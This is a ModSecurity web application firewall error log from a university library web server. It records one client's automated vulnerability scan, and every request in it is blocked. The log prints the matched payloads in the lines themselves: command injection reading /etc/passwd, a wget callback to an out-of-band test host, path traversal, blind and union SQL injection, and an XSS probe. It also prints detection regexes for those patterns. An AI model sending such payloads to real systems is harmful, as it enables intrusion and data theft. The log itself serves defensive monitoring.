[Tue Aug 29 11:33:27.309530 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARQ3@MAAAAB"]
[Tue Aug 29 11:33:27.311431 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARy-tcAAAAb"]
[Tue Aug 29 11:33:27.407331 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARjjMsAAAAL"]
[Tue Aug 29 11:33:29.368787 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARjjNQAAAAL"]
[Tue Aug 29 11:33:29.392142 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARjjNUAAAAL"]
[Tue Aug 29 11:33:29.394873 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibfeb.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARjjNUAAAAL"]
[Tue Aug 29 11:33:32.034533 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASBXOsAAAAM"]
[Tue Aug 29 11:33:32.122961 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgbe7w3g6bp3gz8.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAASAHY4AAAAH"]
[Tue Aug 29 11:33:32.360254 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARv7S8AAAAY"]
[Tue Aug 29 11:33:34.348314 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARLXywAAAAQ"]
[Tue Aug 29 11:33:35.322443 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAARo80MAAAAT"]
[Tue Aug 29 11:33:35.386609 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAASBXQYAAAAM"]
[Tue Aug 29 11:33:35.403381 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAARnmKUAAAAR"]
[Tue Aug 29 11:33:36.331897 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARo80gAAAAT"]
[Tue Aug 29 11:33:36.380599 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARt--QAAAAV"]
[Tue Aug 29 11:33:37.307179 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAARLXzYAAAAQ"]
[Tue Aug 29 11:33:37.363834 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASBXQ8AAAAM"]
[Tue Aug 29 11:33:37.364003 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARv7T0AAAAY"]
[Tue Aug 29 11:33:38.415606 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAAR@KGgAAAAF"]
[Tue Aug 29 11:33:39.330610 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAARjjPEAAAAL"]
[Tue Aug 29 11:33:39.346808 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAASBXRcAAAAM"]
[Tue Aug 29 11:33:40.318376 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JMCo-f0AAARjjPUAAAAL"]
[Tue Aug 29 11:33:40.366649 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAASAHb8AAAAH"]
[Tue Aug 29 11:33:40.439090 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARv7UsAAAAY"]
[Tue Aug 29 11:33:40.440709 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARjjPsAAAAL"]
[Tue Aug 29 11:33:42.295799 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARv7VYAAAAY"]
[Tue Aug 29 11:33:43.303242 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARdiLAAAAAK"]
[Tue Aug 29 11:33:45.361421 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAARy-zUAAAAb"]
